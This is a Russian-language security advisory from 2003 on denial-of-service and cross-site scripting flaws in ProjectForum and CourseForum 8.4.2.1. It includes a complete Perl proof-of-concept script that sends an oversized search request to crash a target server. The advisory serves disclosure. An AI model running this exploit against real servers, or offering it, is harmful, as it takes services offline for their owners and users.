Security Lab

Несколько уязвимостей в ProjectForum и CourseForum

Дата публикации:24.12.2003
Всего просмотров:1637
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: ProjectForum 3.x
CourseForum 3.x
Уязвимые версии: ProjectForum и CourseForum 8.4.2.1

Описание: Несколько уязвимостей обнаружено в ProjectForum и CourseForum. Удаленный пользователь может аварийно завершить работу приложения. Удаленный пользователь может выполнить XSS нападение.

Удаленный пользователь может послать чрезмерно длинный 'find' запрос к целевому серверу, чтобы аварийно завершить работу 'projectforum.exe'.

Также программа не фильтрует HTML код, перед отображением информации пользователю в функции find и странице ошибки.

Пример/Эксплоит:

############################### [pfdos.pl] ###############################

#!/usr/bin/perl -w

############################################################
#                                                          #
# ProjectForum 8.4.2.1 and below DoS Proof of Concept Code #
#  by Peter Winter-Smith [peter4020@hotmail.com]           #
#                                                          #
############################################################

use IO::Socket;

if(!($ARGV[1]))
 
print "\nUsage: pfdos.pl <victim> <port>\n" .
      "\tdefault port is 3455\n\n";
exit;
 

$victim = IO::Socket::INET->new(Proto=>'tcp',
                               PeerAddr=>$ARGV[0],
                               PeerPort=>$ARGV[1])
                           or die "Unable to connect to $ARGV[0] " .
                                  "on port $ARGV[1]";

$DoSpacket = '' .
  'POST /1/Search HTTP/1.1' . "\x0d\x0a" .
  'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, ' .
  'application/x-gsarcade-launch, application/vnd.ms-excel, ' .
  'application/vnd.ms-powerpoint, application/msword, ' .
  'application/x-shockwave-flash, */*' . "\x0d\x0a" .
  'Referer: http://localhost:3455/1/Search' . "\x0d\x0a" .
  'Accept-Language: en-gb..Content-Type: application/x-www-form-' .
  'urlencoded' . "\x0d\x0a" .
  'Accept-Encoding: gzip, deflate' . "\x0d\x0a" .
  'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ' .
  'xxxxxxxxxxxxx' . "\x20" .
  '1.0.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322)' . "\x0d\x0a" .
  'Host: localhost:3455' . "\x0d\x0a" .
  'Content-Length: 6306' . "\x0d\x0a" .
  'Connection: Keep-Alive' . "\x0d\x0a" .
  'Cache-Control: no-cache' . "\x0d\x0a" . "\x0d\x0a" .
  'q=' . 'a'x6292 . '&action=Find' . "\x0d\x0a";


print $victim $DoSpacket;

print " + Making Request ...\n + Server should be dead!!\n";

sleep(4);
close($victim);

print "Done.\n";
exit;

URL производителя: http://www.projectforum.com/projectforum

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: ProjectForum Multiple Vulnerabilities